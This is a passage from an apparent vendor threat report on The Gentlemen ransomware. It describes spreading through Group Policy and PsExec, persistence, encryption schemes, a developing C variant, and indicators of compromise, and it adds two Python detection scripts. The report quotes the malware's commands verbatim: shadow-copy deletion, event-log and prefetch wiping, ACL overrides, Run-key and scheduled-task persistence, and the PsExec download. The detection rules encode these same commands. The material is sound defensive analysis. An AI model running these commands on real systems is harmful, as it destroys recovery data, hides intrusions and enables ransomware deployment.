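        registered[m.group(1).upper()] = [t.upper() for t in tools]
    return registered


def scheduled_tasks_registered(value):
    """True if the GPO registers the Scheduled Tasks CSE, i.e. a ScheduledTasks.xml
    in the GPO's Machine preferences would actually be processed by clients."""
    return SCHEDULED_TASKS_CSE in parse_extension_names(value)


# Locations the post associates with staging the locker for mass deployment.
SUSPICIOUS_LOCATIONS = ("\\netlogon\\", "\\sysvol\\", "\\temp\\")


def audit_scheduled_tasks_xml(xml_text):
    """One finding per task action that runs as SYSTEM or launches something
    from a share or temp location."""
    root = ET.fromstring(xml_text)
    findings = []
    for task in root:  # TaskV2 / ImmediateTaskV2 children of <ScheduledTasks>
        props = task.find("Properties")
        run_as = props.get("runAs", "") if props is not None else ""
        for exec_el in task.iter("Exec"):
            cmd = exec_el.findtext("Command") or ""
            args = exec_el.findtext("Arguments") or ""
            haystack = f"{cmd} {args}".lower()
            suspicious_path = any(loc in haystack for loc in SUSPICIOUS_LOCATIONS)
            if suspicious_path or run_as.lower().endswith("system"):
                findings.append({
                    "task": task.get("name"), "runAs": run_as,
                    "command": cmd, "arguments": args,
                    "reason": "share/temp path" if suspicious_path else "runs as SYSTEM",
                })
    return findings


def audit_gpo(extension_names, scheduled_tasks_xml=None):
    """Combine both checks into a list of reasons; an empty list means nothing found."""
    reasons = []
    if scheduled_tasks_registered(extension_names):
        reasons.append("Scheduled Tasks CSE registered in gPCMachineExtensionNames")
        if scheduled_tasks_xml:
            for f in audit_scheduled_tasks_xml(scheduled_tasks_xml):
                reasons.append(f"task '{f['task']}' ({f['reason']}): {f['command']} {f['arguments']}")
    return reasons


# Constructed sample values (task name, domain and share path are made up).
SAMPLE_EXTENSION_NAMES = (
    "[{00000000-0000-0000-0000-000000000000}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}]"
    "[{AADCED64-746C-4633-A97C-D61349046527}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}]"
)
SAMPLE_SCHEDULED_TASKS_XML = """<ScheduledTasks>
  <ImmediateTaskV2 name="SystemUpdate" uid="{11111111-2222-3333-4444-555555555555}">
    <Properties action="C" name="SystemUpdate" runAs="NT AUTHORITY\\System" logonType="S4U">
      <Task version="1.3">
        <Actions Context="Author">
          <Exec>
            <Command>cmd.exe</Command>
            <Arguments>/c \\\\corp.example\\NETLOGON\\update.exe</Arguments>
          </Exec>
        </Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
</ScheduledTasks>
"""

if __name__ == "__main__":
    for reason in audit_gpo(SAMPLE_EXTENSION_NAMES, SAMPLE_SCHEDULED_TASKS_XML):
        print("FINDING:", reason)
```

In a real audit the attribute value comes from the GPO object in LDAP and the XML from the GPO’s Machine\Preferences\ScheduledTasks folder in SYSVOL; a GPO whose gPCMachineExtensionNames changed at the same time an executable appeared in NETLOGON is exactly the combination the post describes.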
Lateral movement through PsExec

In addition to spreading through Group Policy, the ransomware also uses PsExec for lateral movement when the --spread parameter is provided. If PsExec is absent on the target system, it downloads the tool using the following command:
powershell.exe -Command "Invoke-WebRequest -Uri 'https://live.sysinternals[.]com/PsExec.exe' -OutFile 'C:\Temp\psexec.exe'"
The ransomware then enumerates every computer in the domain by installing and using Remote Server Administration Tools (RSAT) through PowerShell cmdlets. If the PowerShell commands fail, it falls back to the NetServerEnum API.

try { Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" -ErrorAction Stop } catch {}
try { DISM.exe /Online /Add-Capability /CapabilityName:"Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" } catch {}
try { Install-WindowsFeature RSAT-AD-PowerShell -ErrorAction Stop } catch {}
try {
    Import-Module ActiveDirectory -ErrorAction Stop
    Get-ADComputer -Filter * | Select-Object -ExpandProperty Name
} catch {}
Once it has obtained a list of all computers on the domain, the ransomware checks if each computer is active by pinging it with the command ping.exe -n 1 -w 500 {target}. If a computer is found to be active, the ransomware uses PsExec to spread to that computer.
Pre-encryption activities

Before starting to actually encrypt files, the ransomware attempts to stop any active Hyper-V virtual machines, allowing it to encrypt the virtual disk files. It uses PowerShell commands to achieve this, including:

Get-VM | Stop-VM -Force -TurnOff
Get-VM | Where-Object State -eq 'Running' | Stop-VM -Force -TurnOff

The ransomware also terminates specific processes using taskkill.exe and disables and stops certain services using sc.exe. The lists of processes and services are quite long and include various popular software, such as Microsoft Office instances, database management interfaces, remote management software, backup applications and more.
After stopping and terminating all the services and processes from the lists, the ransomware ensures its persistence on the system by:
- Deleting and recreating a scheduled task called “UpdateUser” to run the ransomware on startup
- Adding a registry key to run the ransomware on startup
The commands used for this are:
schtasks.exe /Delete /TN "UpdateUser" /F
schtasks.exe /Create /SC ONSTART /TN "UpdateUser" /TR "<ransomware_path>"
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GupdateS" /t REG_SZ /d "<ransomware_path>" /f

Encryption process
After completing its preparations, the ransomware begins encrypting files using a hybrid encryption algorithm that combines Curve25519 and the XChaCha20 stream cipher. For each file to be encrypted, it generates a Curve25519 key pair and computes a shared secret with the attacker’s public key embedded in its code and encoded in Base64 as HvzC6Dq/siFthWSgE5ozZyQDu9cyxIoxb3NuRHI6pDM=.
Before encrypting a file, the ransomware takes ownership of it and grants the Everyone group (SID S-1-1-0) full control, overriding the file’s existing Access Control List (ACL) entries, using the following commands:
- takeown.exe /f <target_file> /d y
- icacls.exe <target_file> /grant *S-1-1-0:F
The ransomware also includes a list of blacklisted directories, files, and extensions to prevent encryption of essential system components.
As the encryption process begins, the ransomware creates a file named README-GENTLEMEN.txt in each directory, containing the ransom note with the victim ID, Tox ID, and Data Leak Site address. If the --silent parameter is not provided, it also changes the desktop wallpaper to The Gentlemen’s embedded image.
The Gentlemen background image
After completing its operations, the ransomware may wipe free space on the system to hinder data recovery attempts if the --wipe parameter is provided. Additionally, it deletes itself unless the --keep parameter is provided.
Regardless of provided parameters, it also deletes various system files and logs to cover its tracks, using commands such as:
vssadmin.exe delete shadows /all /quiet
wmic.exe shadowcopy delete
wevtutil.exe cl System
wevtutil.exe cl Application
wevtutil.exe cl Security
Additionally, it deletes files from various directories, including:
cmd.exe /C del /f /q C:\Windows\Prefetch\*.*
cmd.exe /C del /f /q C:\ProgramData\Microsoft\Windows Defender\Support\*.*
cmd.exe /C del /f /q %SystemRoot%\System32\LogFiles\RDP*\*.*
cmd.exe /C rd /s /q C:\$Recycle.Bin

C-based ransomware
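The Defender tampering, PsExec download, scheduled-task and Run-key persistence, ACL overrides, shadow copy deletion and log wiping described in the sections above all surface as process command lines, which is where most environments log them first (Sysmon Event ID 1 or Security 4688). The following Python script is an added example written for this post, not Kaspersky’s code and not the malware’s: it runs a small set of regular-expression rules over constructed process-creation records (host names, paths and the locker file name are made up) and groups the hits by phase. It assumes the Defender policy values would be set with reg.exe add rather than by importing the .reg file shown earlier, and the three-phase threshold is an arbitrary tuning choice, since any single one of these commands can also be legitimate administration.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    phase: str           # which stage of the described tradecraft the rule maps to
    pattern: re.Pattern  # case-insensitive regex over the raw command line


# One rule per behaviour the post describes; patterns tolerate quoting differences.
RULES = [
    Rule("defender_tamper", re.compile(r"set-mppreference\s.*-disablerealtimemonitoring\s+\$true", re.I)),
    Rule("defender_tamper", re.compile(r"set-mppreference\s.*-enablecontrolledfolderaccess\s+disabled", re.I)),
    Rule("defender_tamper", re.compile(r"add-mppreference\s.*-exclusion(path|process)\b", re.I)),
    # Assumption: the policy values from the .reg file are written with reg.exe add.
    Rule("defender_tamper", re.compile(
        r"reg(\.exe)?\s+add\s.*policies\\microsoft\\windows defender.*"
        r"disable(antispyware|behaviormonitoring|onaccessprotection|scanonrealtimeenable)", re.I)),
    Rule("tool_download", re.compile(r"invoke-webrequest\s.*psexec", re.I)),
    Rule("persistence", re.compile(r"schtasks(\.exe)?\s+/create\s.*/sc\s+onstart", re.I)),
    Rule("persistence", re.compile(
        r"reg(\.exe)?\s+add\s+\"?hklm\\software\\microsoft\\windows\\currentversion\\run", re.I)),
    Rule("acl_override", re.compile(r"takeown(\.exe)?\s+/f\s", re.I)),
    Rule("acl_override", re.compile(r"icacls(\.exe)?\s.*/grant\s+\*s-1-1-0:f", re.I)),
    Rule("shadow_deletion", re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)),
    Rule("shadow_deletion", re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    Rule("log_clearing", re.compile(r"wevtutil(\.exe)?\s+cl\s+(system|application|security)\b", re.I)),
    Rule("log_clearing", re.compile(
        r"\bdel\s+/f\s+/q\s.*(\\prefetch\\|windows defender\\support|logfiles\\rdp)", re.I)),
]


def classify(command_line):
    """Return the distinct phases (in rule order) that one command line matches."""
    phases = []
    for rule in RULES:
        if rule.pattern.search(command_line) and rule.phase not in phases:
            phases.append(rule.phase)
    return phases


def triage(events):
    """Group matching events by phase. Each event is a dict with 'host' and 'cmd'."""
    findings = {}
    for ev in events:
        for phase in classify(ev["cmd"]):
            findings.setdefault(phase, []).append((ev["host"], ev["cmd"]))
    return findings


def hosts_with_staging(findings, min_phases=3):
    """Hosts on which at least min_phases distinct phases were seen: the combination,
    not any single command, is what separates this from routine administration."""
    per_host = {}
    for phase, hits in findings.items():
        for host, _ in hits:
            per_host.setdefault(host, set()).add(phase)
    return sorted(h for h, seen in per_host.items() if len(seen) >= min_phases)


# Constructed sample process-creation records (hosts, paths and file names are made up).
SAMPLE_EVENTS = [
    {"host": "WS01", "cmd": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -Force"},
    {"host": "WS01", "cmd": "powershell.exe Add-MpPreference -ExclusionPath 'C:\\'"},
    {"host": "WS01", "cmd": "powershell.exe -Command \"Invoke-WebRequest -Uri 'https://live.sysinternals[.]com/PsExec.exe' -OutFile 'C:\\Temp\\psexec.exe'\""},
    {"host": "WS01", "cmd": 'schtasks.exe /Create /SC ONSTART /TN "UpdateUser" /TR "C:\\Temp\\locker.exe"'},
    {"host": "WS01", "cmd": 'reg.exe add "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" /v "GupdateS" /t REG_SZ /d "C:\\Temp\\locker.exe" /f'},
    {"host": "WS01", "cmd": "icacls.exe C:\\Finance\\q3.xlsx /grant *S-1-1-0:F"},
    {"host": "WS01", "cmd": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "WS01", "cmd": "wevtutil.exe cl Security"},
    {"host": "WS01", "cmd": "cmd.exe /C del /f /q C:\\Windows\\Prefetch\\*.*"},
    {"host": "WS02", "cmd": "vssadmin.exe delete shadows /all /quiet"},   # lone hit, e.g. backup admin
    {"host": "WS02", "cmd": "notepad.exe C:\\Users\\alice\\notes.txt"},   # benign
]

if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS)
    for phase, hits in result.items():
        print(f"[{phase}]")
        for host, cmd in hits:
            print(f"  {host}: {cmd}")
    print("hosts with ransomware staging:", hosts_with_staging(result))
```

The rules are intentionally narrow: they encode the exact command shapes in this report rather than generic "PowerShell was used" logic, so they are cheap to run over a whole estate, and the per-host phase count is what turns individual low-confidence hits into an alert worth waking someone for.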
As The Gentlemen’s operations have extended, multiple researchers from different information security vendors have identified two ransomware implant versions: the cross-platform Go variant described above and a C-based ESXi locker for Linux. Our investigation has also uncovered a new, still-in-development C implant, currently limited to Windows.
This new ransomware variant has been observed in a limited number of attacks on organizations. While the overall malware structure remains similar to the Go variant we have described, the encryption algorithm has undergone significant changes, suggesting The Gentlemen group is expanding its capabilities. We believe this variant is still in development and being tested on a small subset of victims, with several parameter options, outlined below.
| Parameter | Description |
|---|---|
| --password | The ransomware needs a password to execute, which is meant to prevent execution on automated systems |
| --remove | The ransomware removes itself after the encryption process has been finished |
| --T | Sleep time before encryption, in seconds |
| --ex | Likely stands for excluded objects (not implemented) |
| --fast | Encryption speed option (not implemented) |
| --superfast | Encryption speed option (not implemented) |
| --ultrafast | Encryption speed option (not implemented) |
| --silent | Likely silent execution (not implemented) |
| --system | Execute with system privileges. Could be used to encrypt local disks, as in the Go variant, but at the time of writing this article, there isn’t sufficient data to support this. |
| --shares | Encrypt the shares connected to the system (not implemented) |
| --full | Full encryption (not implemented) |
| --path | Directory list to be encrypted |

As can be seen from the parameter list, some of the parameters are not yet implemented. We anticipate that this variant will mature and likely be increasingly used in future attacks. Notably, the C variant uses smaller denylists of files, directories and extensions compared to the Go variant, which further suggests that this version of the ransomware is still in development. For example, the list of files that should not be encrypted contains only three items, one of which is the group’s ransom note.
To execute with elevated privileges when receiving the --system parameter, the implant creates a scheduled task called “TaskSystem” using the command schtasks /create /sc DAILY /tn "TaskSystem" /tr "cmd /C cd %s && %s" /st 20:00 /ru system > nul. It then runs the task with elevated privileges using schtasks /run /tn TaskSystem > nul. If “TaskSystem” already exists on the target system, the ransomware first deletes it using schtasks /delete /tn TaskSystem /f > nul, before creating a new one with the same name.
If the ransomware lacks sufficient privileges to access a file, it attempts to modify the file’s ACL by granting FULL_CONTROL permission and setting a new EXPLICIT_ACCESS_A structure using the SetEntriesInAclA API call.
For encryption, the ransomware uses the OpenSSL library, which is statically linked to the binary. Unlike the Go variant, this variant uses the AES256-GCM + RSA encryption scheme. It generates a random 32-byte key and a 16-byte initialization vector (IV) for each file, creating a 48-byte buffer. This buffer is then encrypted using a hardcoded RSA public key and appended to the file. The file’s contents are encrypted with AES256-GCM and written after the encrypted key and IV.
After encrypting all files in a directory, the ransomware decodes a byte array using single-byte XOR decryption and creates a file named !-READ-ME—-GEN-TLE-MEN-!.txt in the directory. It then writes the decoded byte array, which contains the ransom note, to the file.
The ransom note in this version of the ransomware reveals a difference from earlier Go versions: communication with the operators is now conducted via email rather than through Tox Messenger.
After completing the encryption process, the ransomware attempts to clear logs from various event log categories, including System, Forwarded Events, Application, and Setup, using the EvtClearLog API. However, it appears that there may be an error in the event log clearing process, as the category "S" is not a valid default entry for an event log category, suggesting a possible typo or missing parameters.
Event clearing function
Victims

The Gentlemen target a wide range of industries worldwide, including manufacturing, IT services, healthcare, financial services, construction, and logistics. Observed intrusions span several regions, with Brazil, China, Indonesia, Taiwan, and Thailand among the most heavily targeted countries and territories according to our telemetry.

Attribution

We have high confidence in attributing the observed activities to The Gentlemen group and its affiliates. This attribution is based on several key factors, including the consistent use of the group’s name, associated email addresses, and Data Leak Site within the binaries and ransom notes.

Conclusion

The Gentlemen group is rapidly gaining traction in the ransomware landscape, recruiting affiliates and executing high-profile attacks. Their adaptability is evident in the emergence of a C-based ransomware variant, a Go-based backdoor enabling remote command execution, and customized scripts tailored to specific targets. Recent data leaks exposing internal communications and operational plans suggest the group will continue to engage in malicious activity. Organizations are advised to prioritize vulnerability management and system hardening to reduce the risk of compromise.

Indicators of compromise

Additional information about this activity, including indicators of compromise, is available to customers of the Kaspersky Intelligence Reporting Service. If you are interested, please contact [email protected].
Go ransomware
3B46A729DB7AE6AF8B19711C9452194D locker_eryoo5_windows_amd64
02944C8A5535CDB5B2CBB893DB2D5ACF locker_lqy8xb_windows_amd64.exe
10CA9A4040001560D053B7E7885C1B95 locker_28f3cl_windows_386.exe
3C471EBC947CDF32240A90FFADF49B13 locker_aga19g_windows_amd64.exe
4BE8BB62F0EBBCF4CE52C35AB6F794F5 locker_wh54td_windows_386.exe
53C616677BC7E2A0A03127F19166D007 locker_p663zs_windows_amd64.exe
5C3B9821FC82A9028CB63B9671950919 locker.exe
5F0B2C6D9F442754258BF4DD841C8341 locker_t1zged_windows_amd64.exe
608FAF58353B65C45EF9833358AC3787 locker_u90lyt_windows_amd64.exe
6AE7C9A7EA0B8C40A64225734F6BD01D gentle.exe
846DC77C1246DB20D976346E0E359502 locker_p663zs_windows_386.exe
ADAC9984B3CC43D66A0D33079BBEC299 UcAaJ_o_1j9srso9a14071ps4p7s3f81s1b
AE0E536766788478263BF448A9381641 cosmo.exe
B3E418D30312C1B2C58A791286868F42 system_386.exe
C2764744DCB4B0E1DB79CA1E8BF65368 getlwd.exe
D12A5B36DD00586CC374A1CAE43EFED4 locker_c65ffp_windows_amd64.exe
D2F72897E8986303D5567EB2384932B8 UcAaJ_o_1j9srso9a14071ps4p7s3f81s1b
DE1522F9219497632F30F8A6E72F26B6 locker_c7ekh7_windows_amd64.exe
FDAE2BEB813778B4540A997706862096 AIR.exe
B9986A0F1F1F1A798DC3F0C59A80A1A3 fin.exe
Backdoor
554E699C96B332468F1AE69C1AE81EF9 sihost.exe
Vulnerable drivers
5761BD63DA03686FC480245DA7BD1E9F processmonitordriver.sys
B6B51508AD6F462C45FE102C85D246C8 wamsdk.sys
8F0577D28C4FF5F71B149F444BFABA8E gamedriverx64.sys
525EF6014F0EF20E44FE47C1D9980B69 biontdrv_wink.sys
407B6A136BBAA7172EB44EF9D08BB58A biontdrv_winbs.sys
9321A61A25C7961D9F36852ECAA86F55 inpoutx64.sys
73F0A8C3EA794A04E80C32038249F044 wsddprm.sys
EEF8A950952696B018AA9C6DA2F5D7AD havoc.sys
EDB1C480295250DD1A38F3AA1357DEAE netscan64.exe
5537C708EDB9A2C21F88E34E8A0F1744 Advanced_IP_Scanner_2.5.4594.1.exe
\\Netlogon\
C:\Sharing
C:\Temp
C:\Netlogon
C:\Windows\sysvol\domain\scripts\
%TEMP%
%User%\Downloads
%User%\Desktop
81[.]177[.]215[.]15 Backdoor C2